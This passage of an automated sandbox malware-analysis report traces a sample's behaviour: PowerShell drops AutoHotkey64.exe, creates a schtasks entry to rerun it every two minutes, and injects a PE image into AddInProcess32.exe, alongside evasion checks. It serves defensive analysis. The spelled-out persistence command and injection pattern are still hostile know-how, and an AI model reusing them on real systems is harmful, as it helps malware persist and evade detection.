Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 28F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 33D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: B50000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2700000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2500000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4490	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4536	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 6812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 3065	Jump to behavior

Source: C:\Users\Public\Documents\AutoHotkey64.exe

API coverage: 1.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7756	Thread sleep count: 6812 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7976	Thread sleep count: 3065 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8080	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7620	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7640	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7840	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7832	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7860	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140022C90 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 0000000140022E0Dh country: Russian (ru)	19_2_0000000140022C90
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D407 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 000000014002D639h country: Urdu (ur)	19_2_000000014002D407
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D407 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 000000014002D639h country: Inuktitut (iu)	19_2_000000014002D407
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D40F GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 000000014002D639h country: Urdu (ur)	19_2_000000014002D40F
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D40F GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 000000014002D639h country: Inuktitut (iu)	19_2_000000014002D40F
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D416 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 000000014002D639h country: Urdu (ur)	19_2_000000014002D416
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D416 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 000000014002D639h country: Inuktitut (iu)	19_2_000000014002D416
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D43D GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 000000014002D639h country: Urdu (ur)	19_2_000000014002D43D
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D43D GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 000000014002D639h country: Inuktitut (iu)	19_2_000000014002D43D
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D461 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 000000014002D639h country: Urdu (ur)	19_2_000000014002D461
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D461 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 000000014002D639h country: Inuktitut (iu)	19_2_000000014002D461
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D485 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 000000014002D639h country: Urdu (ur)	19_2_000000014002D485
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002D485 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 000000014002D639h country: Inuktitut (iu)	19_2_000000014002D485
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014001D580 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 000000014001D8E2h country: Spanish (es)	19_2_000000014001D580

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400666A0 GetLocalTime followed by cmp: cmp word ptr [rbx], cx and CTI: je 00000001400669D3h		19_2_00000001400666A0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400666A0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140066893h		19_2_00000001400666A0

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BA370 FindFirstFileW,FindClose,FindFirstFileW,FindClose,	19_2_00000001400BA370
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BA270 GetFileAttributesW,FindFirstFileW,FindClose,	19_2_00000001400BA270
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400742C0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,_swprintf,FindNextFileW,FindClose,	19_2_00000001400742C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014004A390 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,	19_2_000000014004A390
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008E5C0 GetFileAttributesW,FindFirstFileW,FindClose,	19_2_000000014008E5C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140074620 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,_swprintf,free,	19_2_0000000140074620
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140074C70 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,	19_2_0000000140074C70
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008DFD0 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,	19_2_000000014008DFD0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477

Source: AddInProcess32.exe, 00000006.00000002.4232692392.0000000004E70000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_0000000140020570 BlockInput,free,BlockInput,

19_2_0000000140020570

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_00000001400DF2C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

19_2_00000001400DF2C0

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_0000000140008040 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,FreeLibrary,GetProcAddress,FreeLibrary,

19_2_0000000140008040

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_00000001400E7758 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,

19_2_00000001400E7758

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400DF2C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_00000001400DF2C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400DB8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000001400DB8A8
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400E1F04 SetUnhandledExceptionFilter,	19_2_00000001400E1F04

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 416000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 418000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 628008	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 416000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 418000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 11FA008	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 416000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 418000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: CBD008	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 416000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 418000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 3FB008	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 416000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 418000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 705008	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 416000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 418000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 65F008	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 416000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 418000	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7DA008	Jump to behavior

Source: C:\Users\Public\Documents\AutoHotkey64.exe

19_2_000000014004FA70

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014001F7C0 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput,

19_2_000000014001F7C0

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014008E770 mouse_event,

19_2_000000014008E770

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\AutoHotkey64.exe "C:\Users\Public\Documents\AutoHotkey64.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: AddInProcess32.exe, 00000006.00000002.4213601750.0000000002921000.00000004.00000800.00020000.00000000.sdmp, AutoHotkey64.exe	Binary or memory string: Program Manager
Source: AutoHotkey64.exe	Binary or memory string: Shell_TrayWnd
Source: AutoHotkey64.exe	Binary or memory string: Progman
Source: powershell.exe, 00000000.00000002.1812122999.0000012DD089D000.00000004.00000800.00020000.00000000.sdmp, AutoHotkey64.exe, 00000002.00000000.1778420471.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000004.00000000.1796075931.00000001400EE000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: TextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt SYSTEM\CurrentControlSet\Control\Keyboard Layouts\Layout 